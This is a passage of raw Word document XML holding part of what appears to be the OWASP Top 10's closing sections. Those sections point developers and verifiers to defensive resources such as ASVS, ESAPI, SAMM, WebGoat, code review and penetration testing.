      <w:pPr>
        <w:spacing w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="305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Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9CDEB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="2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Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D6C17" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="233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Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00787F48" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="233"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B7A73A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="233"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05972D26" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="233"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13ABB7F4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="233"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBCBCC2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="11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pplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA227A6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="25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Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7B9E9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="170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Education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603F8BC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="170"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A1D04" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="458" w:firstLine="170"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE7D853" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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o produce a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secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> web application, you must define what secure means for that application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62D8FF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OWASP recommends you use the OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Appl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ecurit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Verif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tandar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(ASVS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, as a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B7765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guide for setting the security requirements for your application(s). If you’re outsourcing, consider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54901F7A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he </w:t>
      </w:r>
      <w:hyperlink r:id="rId69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9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9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oftware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95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Contract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69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nnex</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId697" w:history="1">
        <w:r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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38147798" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043CC7C2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC8002C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BB4F48" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="23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Rather than retrofitting security into your applications, it is far more cost effective to design the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD58F2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ecurity in from the start. OWASP recommends the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Developer’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Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, and 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698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OWASP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FAA02F1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId699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Prevention Cheat Sheets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as good starting points for guidance on how to design security in from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FDF3F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he beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05644BEE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C1AD58" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6823F889" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="362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Building strong and usable security controls is exceptionally difficult. A set of standard security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47028B71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controls radically simplifies the development of secure applications. OWASP recommends the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC4890" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId700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OWASP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01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Enterprise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02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03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PI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04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(ESAPI)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0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project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as a model for the security APIs needed to produce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768A656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ecure web applications. ESAPI provides reference implementations in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Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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706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Classic</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44C20BE8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId707" w:history="1">
        <w:proofErr w:type="gramStart"/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ASP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId708" w:history="1">
        <w:r w:rsidR="00810992"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,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 w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Python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, and</w:t>
      </w:r>
      <w:r w:rsidR="00810992"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709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Cold Fusion</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId710" w:history="1">
        <w:r w:rsidR="00810992"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.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="634F94E0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0F4E28" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09364D3F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="362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o improve the process your organization follows when building such applications, OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E0EFB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recommends the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oftwar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Assuranc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Maturit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Mode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(SAMM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. This model helps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED16349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organizations formulate and implement a strategy for software security that is tailored to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DAD8E3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pecific risks facing their organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF667E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CBA412" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F623E7F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="362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he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Edu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Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> provides training materials to help educate developers on web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770486EB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pplication security and has compiled a large list of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP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Educationa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Presentations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. For hands-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B8DE16" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216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on learning about vulnerabilities, try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OWASP WebGoat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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WebGoat.NET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, or 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71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OWASP Broken Web</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="662C9714" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId712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Applications Project</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId713" w:history="1">
        <w:r w:rsidR="00810992"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.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To stay current, come to an </w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP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A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AppSec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810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Conference</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, OWASP Conference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ACD718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175" w:space="0"/>
            <w:col w:w="8625" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC4A516" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2031"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Training, or local </w:t>
      </w:r>
      <w:hyperlink r:id="rId714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OWASP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1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Chapter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16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meetings</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId717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.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EFE1003" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2031"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B926D2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="417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There are numerous additional OWASP resources available for your use. Please visit the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94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4"/>
          <w:sz w:val="19"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP Projects page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, which lists all of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113170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he OWASP projects, organized by the release quality of the projects in question (Release Quality, Beta, or Alpha). Most OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468934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resources are available on our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wiki</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, and many OWASP documents can be ordered in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71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hardcopy or as eBooks</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId719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.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AE81704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24C7BBB6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="18"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1D7904FE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="495"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5004E705">
          <v:shape id="imagerId720" o:spid="_x0000_s2190" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:121pt;height:96pt;z-index:-251719168;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId720" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="671F9A28">
          <v:shapetype id="_x0000_m2189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269ED96">
          <v:shape id="_x0000_s2188" type="#_x0000_m2189" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25172838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74CC7366">
          <v:shapetype id="_x0000_m2187" coordsize="54000,3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273FD13">
          <v:shape id="_x0000_s2186" type="#_x0000_m2187" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90pt;width:540pt;height:30pt;z-index:-251727360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16C0A6D5">
          <v:shapetype id="_x0000_m2185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7CD068D">
          <v:shape id="_x0000_s2184" type="#_x0000_m2185" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.5pt;width:541pt;height:1pt;z-index:25170483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0F8152E0">
          <v:shapetype id="_x0000_m2183" coordsize="200,2792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F551465">
          <v:shape id="_x0000_s2182" type="#_x0000_m2183" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89pt;width:2pt;height:279.2pt;z-index:25170585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DFC494C">
          <v:shapetype id="_x0000_m2181" coordsize="200,2792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294C3F2">
          <v:shape id="_x0000_s2180" type="#_x0000_m2181" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:89pt;width:2pt;height:279.2pt;z-index:25170688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02E04DC">
          <v:shapetype id="_x0000_m2179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07D65FA">
          <v:shape id="_x0000_s2178" type="#_x0000_m2179" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.5pt;width:541pt;height:1pt;z-index:25170790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5BE23E7">
          <v:shapetype id="_x0000_m2177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A7426F7">
          <v:shape id="_x0000_s2176" type="#_x0000_m2177" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:366.7pt;width:541pt;height:1pt;z-index:25170892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507A799">
          <v:shapetype id="_x0000_m2175" coordsize="1689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1B57890">
          <v:shape id="_x0000_s2174" type="#_x0000_m2175" style="position:absolute;left:0;text-align:left;margin-left:345.35pt;margin-top:230pt;width:168.95pt;height:.6pt;z-index:-25172633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9DF204D">
          <v:shapetype id="polygon53" o:spid="_x0000_m2173" coordsize="27000,264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FE70AB5">
          <v:shape id="WS_polygon53" o:spid="_x0000_s2172" type="#polygon53" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:372pt;width:270pt;height:26.4pt;z-index:-251725312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1D928857">
          <v:shapetype id="_x0000_m2171" coordsize="271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9852921">
          <v:shape id="WS_polygon54" o:spid="_x0000_s2170" type="#_x0000_m2171" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:397.9pt;width:271.5pt;height:1pt;z-index:25119795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487A152">
          <v:shapetype id="polygon55" o:spid="_x0000_m2169" coordsize="100,349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2448176">
          <v:shape id="WS_polygon55" o:spid="_x0000_s2168" type="#polygon55" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:371pt;width:1pt;height:349pt;z-index:25119897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92747F6">
          <v:shapetype id="polygon56" o:spid="_x0000_m2167" coordsize="100,349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30075C6">
          <v:shape id="WS_polygon56" o:spid="_x0000_s2166" type="#polygon56" style="position:absolute;left:0;text-align:left;margin-left:269.5pt;margin-top:371pt;width:1pt;height:349pt;z-index:251200000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3B2E966">
          <v:shapetype id="polygon57" o:spid="_x0000_m2165" coordsize="271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1B0B7EF">
          <v:shape id="WS_polygon57" o:spid="_x0000_s2164" type="#polygon57" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:371.5pt;width:271.5pt;height:1pt;z-index:25120102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038D296A">
          <v:shapetype id="polygon74" o:spid="_x0000_m2163" coordsize="74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97A75F6">
          <v:shape id="WS_polygon74" o:spid="_x0000_s2162" type="#polygon74" style="position:absolute;left:0;text-align:left;margin-left:7.2pt;margin-top:502.4pt;width:74.5pt;height:.6pt;z-index:-25172428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A0C4FE2">
          <v:shapetype id="polygon75" o:spid="_x0000_m2161" coordsize="888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561720F">
          <v:shape id="WS_polygon75" o:spid="_x0000_s2160" type="#polygon75" style="position:absolute;left:0;text-align:left;margin-left:119.85pt;margin-top:502.4pt;width:88.8pt;height:.6pt;z-index:-25172326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166184F1">
          <v:shapetype id="polygon80" o:spid="_x0000_m2159" coordsize="1118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635BCB6">
          <v:shape id="WS_polygon80" o:spid="_x0000_s2158" type="#polygon80" style="position:absolute;left:0;text-align:left;margin-left:64.3pt;margin-top:514.4pt;width:111.8pt;height:.55pt;z-index:-25172224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6955D92">
          <v:shapetype id="_x0000_m2157" coordsize="692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B338081">
          <v:shape id="_x0000_s2156" type="#_x0000_m2157" style="position:absolute;left:0;text-align:left;margin-left:63.1pt;margin-top:718.4pt;width:69.2pt;height:.55pt;z-index:-25172121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1D5C63B">
          <v:shapetype id="_x0000_m2155" coordsize="26400,2717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229887">
          <v:shape id="_x0000_s2154" type="#_x0000_m2155" style="position:absolute;left:0;text-align:left;margin-left:276pt;margin-top:372pt;width:264pt;height:27.15pt;z-index:-251720192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57425DBD">
          <v:shapetype id="_x0000_m2153" coordsize="265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8130EAD">
          <v:shape id="_x0000_s2152" type="#_x0000_m2153" style="position:absolute;left:0;text-align:left;margin-left:275pt;margin-top:398.65pt;width:265.5pt;height:1pt;z-index:25170995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7E26D5B7">
          <v:shapetype id="_x0000_m2151" coordsize="200,35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2E1C9A3">
          <v:shape id="_x0000_s2150" type="#_x0000_m2151" style="position:absolute;left:0;text-align:left;margin-left:275.5pt;margin-top:371pt;width:2pt;height:350pt;z-index:25171097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B014B4F">
          <v:shapetype id="_x0000_m2149" coordsize="2655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BB2C80E">
          <v:shape id="_x0000_s2148" type="#_x0000_m2149" style="position:absolute;left:0;text-align:left;margin-left:275pt;margin-top:371.5pt;width:265.5pt;height:1pt;z-index:251712000;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#4e8542" strokeweight="1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+V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C14FE0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="495"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="012228C8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What’s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Next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for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Verifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683436C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44BE33A4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD002C4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A06F5D0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781119E1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="35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Get Organized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431ACD8A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="421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o verify the security of a web application you have developed, or one you are considering purchasing, OWASP recommends that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C0A43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you review the application’s code (if available), and test the application as well. OWASP recommends a combination of secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32921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code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B6FF8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echniques, and the two approaches complement each other. Tools for assisting the verification process can improve the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3615A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efficiency and effectiveness of an expert analyst. OWASP’s assessment tools are focused on helping an expert become more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA6E8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effective, rather than trying to automate the analysis process itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEC054" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B53275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Standardizing How You Verify Web Application Security: To help organizations develop consistency and a defined level of rigor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D611C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when assessing the security of web applications, OWASP has produced the OWASP </w:t>
      </w:r>
      <w:hyperlink r:id="rId721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Applic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22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ecurity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23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Verification</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId72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  <w:u w:val="none"/>
          </w:rPr>
          <w:t>Standard</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35634843" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
